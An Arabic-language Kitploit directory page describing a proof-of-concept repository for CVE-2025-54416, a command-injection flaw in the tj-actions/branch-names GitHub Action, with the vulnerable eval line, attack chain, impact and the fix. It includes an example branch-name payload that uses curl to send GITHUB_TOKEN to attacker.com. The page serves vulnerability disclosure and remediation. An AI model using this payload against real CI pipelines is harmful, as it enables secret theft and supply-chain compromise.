Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
atlas-tj-actions-poc — PoC لثغرة حقن الأوامر CVE-2025-54416 في tj-actions/branch-names | Kitploit
أدوات/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
تحليل الثغرات الأمنيةالاستغلالتسريب البياناتالقيادة والسيطرةأمن سلسلة التوريدالتعلم والتعليم
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

PoC لثغرة حقن الأوامر CVE-2025-54416 في tj-actions/branch-names

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-54416: إثبات المفهوم لثغرة حقن الأوامر في tj-actions/branch-names

يُوضح هذا المستودع CVE-2025-54416، وهي ثغرة حرجة في حقن الأوامر في tj-actions/branch-names تؤثر على أكثر من 5,000 مستودع عام.

الثغرة

يستخدم إجراء GitHub tj-actions/branch-names (الإصدارات <= 8.2.1) نمط eval printf "%s" غير الآمن، مما يعيد تقديم مخاطر حقن الأوامر بعد التنقية السليمة.

root@kitploit:~
# Vulnerable code pattern in tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

سلسلة الهجوم

  1. ينشئ المهاجم فرعًا باسم خبيث يحتوي على أوامر shell
  2. يستخدم سير عمل الضحية tj-actions/[email protected] لاستخراج اسم الفرع
  • يُستخدم اسم الفرع المستخرج (مع حمولة المهاجم) في أوامر shell لاحقة
  • يُنفَّذ الأمر في سياق مشغّل CI بصلاحياته
  • تُسرَّب الأسرار (مفاتيح AWS، GITHUB_TOKEN، إلخ)
  • مثال على الحمولة

    اسم الفرع: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

    عند تشغيل سير العمل:

    root@kitploit:~
    echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
    # Actual output: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
    # The $(...) is evaluated by the shell, exfiltrating GITHUB_TOKEN
    

    التأثير

    • سرقة الأسرار الحساسة (مفاتيح AWS، رموز API، GITHUB_TOKEN)
    • تعديلات غير مصرّح بها على الكود
    • دفع صور خبيثة إلى سجلات الإنتاج
    • هجمات على سلسلة التوريد عبر CI/CD مخترق

    الإصلاح

    قم بالتحديث إلى tj-actions/branch-names@v9 أو إصدار أحدث، والذي يستبدل eval printf "%s" باستدعاءات printf آمنة.

    المراجع

    • GitHub Advisory GHSA-gq52-6phf-x2r6
    • CVE-2025-54416
    تنزيل الأداة